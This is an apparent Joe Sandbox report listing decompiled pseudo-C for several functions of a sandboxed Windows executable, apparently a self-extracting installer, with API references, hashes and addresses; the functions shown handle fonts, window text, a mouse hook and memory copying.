Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@memcpy$ByteCharMultiWide
String ID:
API String ID: 1626065140-0
Opcode ID: 93f7aad1806c94775ca1a0d8f3ad7751ed0721520a76da4e217b367523b252c3
Instruction ID: 1758fece63184e570d04f9e3611b3a9f4be235bc0ae71469d74a11a45544da14
Opcode Fuzzy Hash: 93f7aad1806c94775ca1a0d8f3ad7751ed0721520a76da4e217b367523b252c3
Instruction Fuzzy Hash: 123175B3D001199BDB15EBD5CD929EEB7B9AE51315B10003FE902731D1EF386E44D668

Uniqueness

Uniqueness Score: -1.00%

Function 00407907, Relevance: 6.1, APIs: 4, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00407907(intOrPtr* __ecx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v16;
				char _v24;
				struct tagLOGFONTW _v500;
				intOrPtr _v504;
				intOrPtr _v508;
				void _v524;
				intOrPtr* _t27;
				void* _t33;
				intOrPtr* _t41;
				intOrPtr _t43;

				_v8 = _v8 & 0x00000000;
				_t41 = __ecx;
				_v524 = 0x1f4;
				if(SystemParametersInfoW(0x29, 0x1f4,  &_v524, 0) != 0) {
					_t43 =  *((intOrPtr*)(_t41 + 0x1c)) + _v508 - 0x1a;
					if(( *0x41e44c & 0x00000200) == 0) {
						_t43 = _t43 + GetSystemMetrics(0x31);
					}
					_t33 = CreateFontIndirectW( &_v500);
					if(_t33 != 0) {
						_push(0x860);
						_push(_t33);
						_push( &_v24);
						_push(_a4);
						if( *((intOrPtr*)( *_t41 + 8))() != 0) {
							_t43 = _t43 + _v16;
							_v8 = 1;
						}
						DeleteObject(_t33);
					}
					_t27 = _a8;
					 *_t27 = _t43;
					 *((intOrPtr*)(_t27 + 4)) = _v504;
				}
				return _v8;
			}

0x00407910
0x00407917
0x00407928
0x00407936
0x0040794d
0x00407951
0x0040795b
0x0040795b
0x0040796a
0x0040796e
0x00407972
0x00407977
0x0040797b
0x0040797c
0x00407986
0x00407988
0x0040798b
0x0040798b
0x00407993
0x00407993
0x00407999
0x004079a2
0x004079a5
0x004079a8
0x004079ae

APIs

SystemParametersInfoW.USER32 ref: 0040792E
GetSystemMetrics.USER32 ref: 00407955
CreateFontIndirectW.GDI32(?), ref: 00407964
DeleteObject.GDI32(00000000), ref: 00407993

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: System$CreateDeleteFontIndirectInfoMetricsObjectParameters
String ID:
API String ID: 1900162674-0
Opcode ID: 3aa07e0a7f1af689ece96d308e0d97d5d4d1cf2e54ab12650ba7b2974e37ea09
Instruction ID: 552ae8ed6ee0fcd442ad2df4779f82c6782e58800ccef47fbdddea08636dacf5
Opcode Fuzzy Hash: 3aa07e0a7f1af689ece96d308e0d97d5d4d1cf2e54ab12650ba7b2974e37ea09
Instruction Fuzzy Hash: 471163B5A00209AFEB10DF54DC88FEAB7B8EB08304F04806AED15A7291DB74ED44CF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C0, Relevance: 6.0, APIs: 4, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E0040C0C0(intOrPtr* __ecx, intOrPtr _a4) {
				signed int _t16;
				intOrPtr* _t21;
				intOrPtr _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;

				_t34 = __ecx;
				_t1 = _t34 + 8; // 0x0
				_t16 =  *_t1;
				if(_t16 >=  *__ecx) {
					_t2 = _t34 + 4; // 0x0
					_t33 =  *((intOrPtr*)( *_t2 + _t16 * 4 - 4));
					if(_t33 != 0) {
						_t16 =  *(_t33 + 0x18);
						_push(_t16);
						L004191B0();
						_push(_t33);
						L004191B0();
						_t35 = _t35 + 8;
					}
					 *(_t34 + 8) =  *(_t34 + 8) - 1;
				}
				_push(0x40);
				L004191BC();
				if(_t16 == 0) {
					_t32 = 0;
				} else {
					_t32 = E0040BC50(_t16, _a4);
				}
				_t10 = _t34 + 4; // 0x41e61c
				E0040261B(_t10);
				_t11 = _t34 + 8; // 0x0
				_t12 = _t34 + 4; // 0x0
				memmove( *_t12 + 4,  *_t12,  *_t11 +  *_t11 +  *_t11 +  *_t11);
				_t13 = _t34 + 4; // 0x0
				_t21 =  *_t13;
				 *_t21 = _t32;
				 *(_t34 + 8) =  *(_t34 + 8) + 1;
				return _t21;
			}

0x0040c0c1
0x0040c0c3
0x0040c0c3
0x0040c0c9
0x0040c0cb
0x0040c0d0
0x0040c0d6
0x0040c0d8
0x0040c0db
0x0040c0dc
0x0040c0e1
0x0040c0e2
0x0040c0e7
0x0040c0e7
0x0040c0ea
0x0040c0ea
0x0040c0ed
0x0040c0ef
0x0040c0f9
0x0040c10b
0x0040c0fb
0x0040c107
0x0040c107
0x0040c10d
0x0040c110
0x0040c115
0x0040c118
0x0040c125
0x0040c12b
0x0040c12b
0x0040c131
0x0040c133
0x0040c138

APIs

??3@YAXPAX@Z.MSVCRT ref: 0040C0DC
??3@YAXPAX@Z.MSVCRT ref: 0040C0E2
??2@YAPAXI@Z.MSVCRT ref: 0040C0EF
memmove.MSVCRT ref: 0040C125

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$??2@memmove
String ID:
API String ID: 1826340609-0
Opcode ID: 126f2fac56c6236123481fbc6754aed5f91a3439ded8f262b77e3889e227fec6
Instruction ID: d72a3ecf45b14767aacc25f0edad6bbd2b7de6c552061b2cfde35ae26a62c5f5
Opcode Fuzzy Hash: 126f2fac56c6236123481fbc6754aed5f91a3439ded8f262b77e3889e227fec6
Instruction Fuzzy Hash: 67019E76600601ABD210AB59D8859A773F6EBC4314708893EE85BD7741DB38E892CB68

Uniqueness

Uniqueness Score: -1.00%

Function 0040455D, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040455D(WCHAR** __ecx) {
				char _v16;
				void* _t8;
				long _t11;
				long _t12;
				void* _t17;
				void* _t29;
				WCHAR* _t30;
				WCHAR** _t32;

				_t32 = __ecx;
				E00411B60(_t8,  &_v16);
				_t30 =  *__ecx;
				_t11 = ExpandEnvironmentStringsW(_t30, E004042F3( &_v16, _t29, 1), 1);
				if(_t11 != 0) {
					_t12 = _t11 + 1;
					ExpandEnvironmentStringsW( *_t32, E004042F3( &_v16, _t29, _t12), _t12);
					E004042D8( &_v16);
					_t17 = E00411C48(_t32,  &_v16);
					_push(_v16);
					L004191B0();
					return _t17;
				}
				_push(_v16);
				L004191B0();
				return _t11;
			}

0x00404564
0x0040456a
0x0040456f
0x00404585
0x00404589
0x00404599
0x004045a6
0x004045ab
0x004045b6
0x004045bb
0x004045be
0x00000000
0x004045c4
0x0040458b
0x0040458e
0x00000000

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT ref: 0040432C

ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000,?,00000000,00000000,?), ref: 00404585
??3@YAXPAX@Z.MSVCRT ref: 0040458E
ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000001,00000001,00000000), ref: 004045A6
??3@YAXPAX@Z.MSVCRT ref: 004045BE

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@$EnvironmentExpandStrings$??2@wcsncpy
String ID:
API String ID: 3034541985-0
Opcode ID: edf92da874c2a2dcd95a3b57251898c6a6453fd984ab7839611e51fcefc3116a
Instruction ID: 2e5778dcc9210aa7dd5b0ff30e3ff33adc1733fc5fdfc97d9385700bbc9d95d0
Opcode Fuzzy Hash: edf92da874c2a2dcd95a3b57251898c6a6453fd984ab7839611e51fcefc3116a
Instruction Fuzzy Hash: E6F086B29001047ED714B755EC52DEE737CDF80704B10027EFA12B2195EF756E45C668

Uniqueness

Uniqueness Score: -1.00%

Function 00408DCA, Relevance: 6.0, APIs: 4, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00408DCA(int _a4, int _a8, struct tagPOINT* _a12) {
				struct tagRECT _v20;
				intOrPtr _t11;
				intOrPtr _t16;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr* _t23;
				struct tagPOINT* _t25;

				_t11 =  *0x41e8b4; // 0x0
				if(_t11 == 0) {
					return 0;
				}
				_t25 = _a12;
				if( *((intOrPtr*)(_t11 + 0x48)) <= 0) {
					L9:
					return CallNextHookEx( *0x41e8b8, _a4, _a8, _t25);
				}
				_t21 =  *0x41e5f0; // 0x202
				_t23 = 0x41e5f0;
				while(_t21 != 0) {
					if(_t21 == _a8) {
						ScreenToClient( *(_t11 + 4), _t25);
						_t16 =  *0x41e8b4; // 0x0
						GetClientRect( *(_t16 + 4),  &_v20);
						_push(_t25->y);
						if(PtInRect( &_v20,  *_t25) != 0) {
							_t22 =  *0x41e8b4; // 0x0
							E00408557(_t22);
						}
						goto L9;
					}
					_t23 = _t23 + 4;
					_t21 =  *_t23;
				}
				goto L9;
			}

0x00408dcd
0x00408dd7
0x00000000
0x00408e50
0x00408dde
0x00408de1
0x00408e3a
0x00000000
0x00408e4d
0x00408de3
0x00408de9
0x00408dfa
0x00408df3
0x00408e04
0x00408e0e
0x00408e16
0x00408e1c
0x00408e2d
0x00408e2f
0x00408e35
0x00408e35
0x00000000
0x00408e2d
0x00408df5
0x00408df8
0x00408df8
0x00000000

APIs

ScreenToClient.USER32 ref: 00408E04
GetClientRect.USER32 ref: 00408E16
PtInRect.USER32(?,?,?), ref: 00408E25

Part of subcall function 00408557: KillTimer.USER32(?,00000001,?,00408E3A), ref: 00408565

CallNextHookEx.USER32(?,?,?), ref: 00408E47

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ClientRect$CallHookKillNextScreenTimer
String ID:
API String ID: 3015594791-0
Opcode ID: 5d011e402e72c6a9b9df993ad098a0545963fe571f3a7749bf0a2aad1169c23d
Instruction ID: 8fcd255104d3cefc2dd881faf99252f3ba0547ec7e41450095debebf42560e69
Opcode Fuzzy Hash: 5d011e402e72c6a9b9df993ad098a0545963fe571f3a7749bf0a2aad1169c23d
Instruction Fuzzy Hash: 80015B35100115EBDB11AF55DE09EAA7BA6FB04304B08843AE956E32A1EB34E851DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004118AA, Relevance: 6.0, APIs: 4, Instructions: 44
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 70%

			E004118AA(void** __ecx, void* _a4) {
				void* _v0;
				void* _v20;
				signed int _t29;
				void* _t33;
				void* _t36;
				void* _t38;
				void* _t39;
				void** _t40;
				signed int _t51;
				signed int _t53;
				void* _t55;
				signed int _t56;
				void** _t57;
				void** _t58;
				void* _t64;

				_t40 = __ecx;
				_t55 = _a4;
				_t57 = __ecx;
				if(_t55 < __ecx[1]) {
					L3:
					_push(0x41c9d4);
					_push( &_a4);
					_a4 = 0x13329ad;
					L00419360();
					asm("int3");
					_t38 = _v20;
					_push(_t57);
					_push(_t55);
					_t58 = _t40;
					__eflags = _t38 - 0x40000000;
					if(__eflags >= 0) {
						_push(0x41c9d4);
						_push( &_v0);
						_v0 = 0x13329ad;
						L00419360();
					}
					_t51 = 2;
					_t19 = _t38 + 1; // 0x13329ae
					_t29 = _t19 * _t51;
					_push( ~(0 | __eflags > 0x00000000) | _t29); // executed
					L004191BC(); // executed
					_t56 = _t29;
					__eflags = 0;
					 *_t56 = 0;
					_push( *_t58);
					L004191B0();
					 *_t58 = _t56;
					_t58[2] = _t38;
					return 0;
				} else {
					_t64 = _t55 - 0x40000000;
					if(_t64 >= 0) {
						goto L3;
					} else {
						_t53 = 2;
						_t33 = (_t55 + 1) * _t53;
						_push( ~(0 | _t64 > 0x00000000) | _t33);
						L004191BC();
						_t39 = _t33;
						_t36 = memcpy(_t39,  *__ecx, __ecx[1] + __ecx[1] + 2);
						_push( *_t57);
						L004191B0();
						_t57[2] = _t55;
						 *_t57 = _t39;
						return _t36;
					}
				}
			}

0x004118aa
0x004118b0
0x004118b3
0x004118b8
0x00411901
0x00411901
0x00411909
0x0041190a
0x00411911
0x00411916
0x0041191b
0x0041191e
0x0041191f
0x00411920
0x00411922
0x00411928
0x0041192a
0x00411932
0x00411933
0x0041193a
0x0041193a
0x00411943
0x00411944
0x00411947
0x00411950
0x00411951
0x00411956
0x00411958
0x0041195a
0x0041195d
0x0041195f
0x00411966
0x00411969
0x0041196f
0x004118ba
0x004118ba
0x004118c0
0x00000000
0x004118c2
0x004118c6
0x004118ca
0x004118d3
0x004118d4
0x004118d9
0x004118e6
0x004118eb
0x004118ed
0x004118f5
0x004118f9
0x004118fe
0x004118fe
0x004118c0

APIs

??2@YAPAXI@Z.MSVCRT ref: 004118D4
memcpy.MSVCRT ref: 004118E6
??3@YAXPAX@Z.MSVCRT ref: 004118ED
_CxxThrowException.MSVCRT(00000000,0041C9D4), ref: 00411911

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??2@??3@ExceptionThrowmemcpy
String ID:
API String ID: 3462485524-0
Opcode ID: 71123eed11fa2f1b323339261328c3efbf2789a7fba42d01c6ba3ead12da29be
Instruction ID: 5ee8940816b856f5d356b0442bc385a37373ddd71d54f703b79fddb5c0f671e4
Opcode Fuzzy Hash: 71123eed11fa2f1b323339261328c3efbf2789a7fba42d01c6ba3ead12da29be
Instruction Fuzzy Hash: 37F0A4B22002097FD7249F29C886D9AF7EDEF44358B15853FF55A87111D635E9808768

Uniqueness

Uniqueness Score: -1.00%

Function 00413ECE, Relevance: 6.0, APIs: 4, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E00413ECE(void* __ecx, signed char _a4) {
				signed int _t13;
				signed char _t15;
				signed int _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				signed int* _t28;

				_t15 = _a4;
				_t25 = __ecx;
				if((_t15 & 0x00000002) == 0) {
					_push( *((intOrPtr*)(__ecx + 8)));
					L004191B0();
					if((_t15 & 0x00000001) != 0) {
						_push(__ecx);
						L004191B0();
					}
					return _t25;
				}
				_t28 = __ecx - 4;
				_t22 =  *_t28;
				_t13 = _t22 * 0x18;
				_t23 = _t22 - 1;
				if(_t23 < 0) {
					L4:
					if((_t15 & 0x00000001) != 0) {
						_push(_t28);
						L004191B0();
					}
					return _t28;
				}
				_t6 = _t25 + 8; // 0x8
				_t26 = _t13 + _t6;
				do {
					_t26 = _t26 - 0x18;
					_push( *_t26);
					L004191B0();
					_t23 = _t23 - 1;
				} while (_t23 >= 0);
				goto L4;
			}

0x00413ecf
0x00413ed4
0x00413ed9
0x00413f0f
0x00413f12
0x00413f1b
0x00413f1d
0x00413f1e
0x00413f23
0x00000000
0x00413f24
0x00413edd
0x00413ee0
0x00413ee5
0x00413ee8
0x00413ee9
0x00413efd
0x00413f00
0x00413f02
0x00413f03
0x00413f08
0x00000000
0x00413f0c
0x00413eeb
0x00413eeb
0x00413eef
0x00413eef
0x00413ef2
0x00413ef4
0x00413ef9
0x00413efa
0x00000000

APIs

??3@YAXPAX@Z.MSVCRT ref: 00413EF4
??3@YAXPAX@Z.MSVCRT ref: 00413F03
??3@YAXPAX@Z.MSVCRT ref: 00413F12
??3@YAXPAX@Z.MSVCRT ref: 00413F1E

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 6ecebc8fe35b15f2f4658fd50fc4d58a1ee2178658a9431f9aca16722c220241
Instruction ID: df1d0de5d1faf2a4a63eb667afbff75c77527abce675b50cc2a020710efc852e
Opcode Fuzzy Hash: 6ecebc8fe35b15f2f4658fd50fc4d58a1ee2178658a9431f9aca16722c220241
Instruction Fuzzy Hash: 7CF084323042022AD2111F0DDC0A7CABBFA9F41362F08001FFA41A2362CA1ADEC2C18C

Uniqueness

Uniqueness Score: -1.00%

Function 00404C1B, Relevance: 6.0, APIs: 4, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00404C1B(struct HWND__* __ecx) {
				WCHAR* _v16;
				char _v28;
				char _v40;
				int _t19;
				struct HWND__* _t31;
				void* _t33;

				_t31 = __ecx;
				E00404BDD( &_v16, __ecx, _t33);
				E0040562E( &_v16, _t33);
				E00411B84( &_v40, "%");
				E00411B84( &_v28, L"%^");
				E00411F27( &_v16,  &_v28,  &_v40);
				_push(_v28);
				L004191B0();
				_push(_v40);
				L004191B0();
				_t19 = SetWindowTextW(_t31, _v16);
				_push(_v16);
				L004191B0();
				return _t19;
			}

0x00404c22
0x00404c29
0x00404c31
0x00404c3e
0x00404c4b
0x00404c5b
0x00404c60
0x00404c63
0x00404c68
0x00404c6b
0x00404c76
0x00404c7c
0x00404c81
0x00404c8b

APIs

Part of subcall function 00404BDD: GetWindowTextLengthW.USER32(?), ref: 00404BEA
Part of subcall function 00404BDD: GetWindowTextW.USER32 ref: 00404C04

Part of subcall function 00411B84: memcpy.MSVCRT ref: 00411BAA

??3@YAXPAX@Z.MSVCRT ref: 00404C63
??3@YAXPAX@Z.MSVCRT ref: 00404C6B
SetWindowTextW.USER32(?,?), ref: 00404C76
??3@YAXPAX@Z.MSVCRT ref: 00404C81

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ??3@TextWindow$Lengthmemcpy
String ID:
API String ID: 396479319-0
Opcode ID: 0445f756f2a7ca887c11b9469608701bcee61c3d7040cf18a8db65bd5d881795
Instruction ID: 647b8b2bf9eadde8599631ea9265a657a51aafb4ceea6ad50fefe68966c78ca3
Opcode Fuzzy Hash: 0445f756f2a7ca887c11b9469608701bcee61c3d7040cf18a8db65bd5d881795
Instruction Fuzzy Hash: 63F04432D044096ACB05F7D1EC578DDB779DE08318B1001ABF602B21A1EF796ED5C69C

Uniqueness

Uniqueness Score: -1.00%

Function 00408287, Relevance: 6.0, APIs: 4, Instructions: 34
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00408287(void* __ecx) {
				struct tagLOGFONTW _v96;
				int _t8;
				long _t11;
				int _t15;

				if(( *0x41e44c & 0x00000010) != 0) {
					_t8 = GetObjectW( *(__ecx + 0x34), 0x5c,  &_v96);
					if(_t8 != 0) {
						_v96.lfWeight = 0x2bc;
						_t11 = CreateFontIndirectW( &_v96);
						_t15 = _t11;
						if(_t15 != 0) {
							_t11 = SendMessageW(GetDlgItem( *(__ecx + 4), 0x4b5), 0x30, _t15, 0);
						}
						return _t11;
					}
				}
				return _t8;
			}

0x00408297
0x004082a2
0x004082aa
0x004082b1
0x004082b8
0x004082be
0x004082c2
0x004082d8
0x004082d8
0x00000000
0x004082de
0x004082aa
0x004082e1

APIs

GetObjectW.GDI32(?,0000005C,?), ref: 004082A2
CreateFontIndirectW.GDI32(?), ref: 004082B8
GetDlgItem.USER32 ref: 004082CC
SendMessageW.USER32(00000000,00000030,00000000,00000000), ref: 004082D8

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: CreateFontIndirectItemMessageObjectSend
String ID:
API String ID: 2001801573-0
Opcode ID: 5b90f754ead787c82706a5892f36a112a510cb736c9de123742b44b620c41e27
Instruction ID: a857720c60cc7c4988bb0c271694e7fb1085ae67bc77bdb5017f4508090161c8
Opcode Fuzzy Hash: 5b90f754ead787c82706a5892f36a112a510cb736c9de123742b44b620c41e27
Instruction Fuzzy Hash: BAF0BE75501708ABD7205BA4DE09FCB7FACAB48B00F048039AE42E21D4DBB4D8108B29

Uniqueness

Uniqueness Score: -1.00%

Function 004039BC, Relevance: 6.0, APIs: 4, Instructions: 27
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004039BC(struct HWND__* __ecx, struct tagPOINT* __edx) {
				struct HWND__* _t1;
				struct HWND__* _t7;
				struct HWND__* _t10;
				struct tagPOINT* _t12;

				_t10 = __ecx;
				_t12 = __edx;
				_t1 = GetParent(__ecx);
				_t7 = _t1;
				if(_t7 != 0) {
					GetWindowRect(_t10, _t12);
					ScreenToClient(_t7, _t12);
					ScreenToClient(_t7, _t12 + 8);
					return 1;
				}
				return _t1;
			}

0x004039bf
0x004039c2
0x004039c4
0x004039ca
0x004039ce
0x004039d2
0x004039e0
0x004039e7
0x00000000
0x004039eb
0x004039ef

APIs

GetParent.USER32 ref: 004039C4
GetWindowRect.USER32 ref: 004039D2
ScreenToClient.USER32 ref: 004039E0
ScreenToClient.USER32 ref: 004039E7

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281255068.000000000041E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.281261332.0000000000423000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_32_64_ver_2_bit.jbxd

Similarity

API ID: ClientScreen$ParentRectWindow
String ID:
API String ID: 2099118873-0
Opcode ID: 2d4f567ce59a15c9bff0a5a7b1bdb7657322f25b8406bf3dc624692a176b5e82
Instruction ID: 05e44d1457520c43b4422ecb6510286d39cbf22b8ad041ba1dad1a8fa24c712d
Opcode Fuzzy Hash: 2d4f567ce59a15c9bff0a5a7b1bdb7657322f25b8406bf3dc624692a176b5e82
Instruction Fuzzy Hash: 06E0C2732022206B931127B66C88CEB5E5CCDC25723060036F909D2311C9B5CC0185B0

Uniqueness

Uniqueness Score: -1.00%

Function 00405A8B, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E00405A8B(intOrPtr __ecx, void* __edx, void* __eflags, signed short* _a4, char _a7, signed int _a8) {
				signed int _v8;
				intOrPtr _v12;
				char _v24;
				void* _t23;
				signed int _t25;
				signed int _t27;
				void* _t34;
				signed short* _t48;
				signed short* _t49;

				_v12 = __ecx;
				_t34 = __edx;
				E00411B60(_t23,  &_v24);
				_t48 = _a4;
				_t49 = _t48;
				_a7 = 0;
				while(1) {
					L1:
					_t25 =  *_t49 & 0x0000ffff;
					if(_t25 >= 0x30 && _t25 <= 0x39) {
					}
					L9:
					E00411BE5( &_v24, _t34);
					E004015EC( &_v24,  *_t49 & 0x0000ffff);
					_v8 = _v8 & 0x00000000;
					_t49 =  &(_t49[1]);
					if(E00405041() == 0) {
						L1:
						_t25 =  *_t49 & 0x0000ffff;
						if(_t25 >= 0x30 && _t25 <= 0x39) {
						}
						goto L3;
					} else {
						L10:
						_a7 = 1;
						do {
							_v12();
							_v8 = _v8 + 1;
						} while (E00405041() != 0);
						do {
							goto L1;
						} while (E00405041() == 0);
						goto L10;
					}
					L13:
					_t27 = _a8;
					__eflags = _t27;
					if(_t27 != 0) {
						__eflags = _t27 - 1;
						if(__eflags == 0) {
							L19:
							_t27 = E00405A8B(_v12, _t34, __eflags, 0x41a648, 0xffffffff);
						} else {
							_t27 =  *_t48 & 0x0000ffff;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								__eflags = _a7;
								if(_a7 == 0) {
									__eflags = _t27;
									if(__eflags != 0) {
										goto L19;
									}
								}
							} else {
								__eflags = _a8 - 0xffffffff;
								if(_a8 != 0xffffffff) {
									goto L17;
								}
							}
						}
					}
					_push(_v24);
					L004191B0();
					return _t27;
					L3:
					if(_t25 >= 0x61 && _t25 <= 0x7a) {
						goto L9;
					}
					if(_t25 >= 0x41 && _t25 <= 0x5a) {
						goto L9;
					}
					if(_t48 == _t49 && _a8 == 0xffffffff) {
						goto L9;
					}
					goto L13;
				}
			}

0x00405a93
0x00405a9a
0x00405a9c
0x00405aa1
0x00405aa4
0x00405aa6
0x00405aaa
0x00405aaa
0x00405aaa
0x00405ab0
0x00405ab0
0x00405ad5
0x00405ad9
0x00405ae5
0x00405aed
0x00405af4
0x00405afe
0x00405aaa
0x00405aaa
0x00405ab0
0x00405ab0
0x00000000
0x00405b00
0x00405b00
0x00405b00
0x00405b04
0x00405b06
0x00405b0c
0x00405b17
0x00405aaa
0x00000000
0x00000000
0x00000000
0x00405aaa
0x00405b1d
0x00405b20
0x00405b20
0x00405b23
0x00405b25
0x00405b26
0x00405b41
0x00405b4d
0x00405b28
0x00405b28
0x00405b2b
0x00405b2e
0x00405b36
0x00405b36
0x00405b3a
0x00405b3c
0x00405b3f
0x00000000
0x00000000
0x00405b3f
0x00405b30
0x00405b30
0x00405b34
0x00000000
0x00000000
0x00405b34
0x00405b2e
0x00405b26
0x00405b52
0x00405b55
0x00405b5f
0x00405ab7
0x00405aba
0x00000000
0x00000000
0x00405ac4
0x00000000
0x00000000
0x00405acd
0x00000000
0x00000000
0x00000000
0x00405acd

APIs

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

??3@YAXPAX@Z.MSVCRT ref: 00405B55

Strings

Shortcut, xrefs: 00405AD5
PreExtract, xrefs: 00405A96

Memory Dump Source

Source File: 00000000.00000002.281234864.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.281228991.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.281248703.000000000041A000.00000002.00020000.sdmp Download File
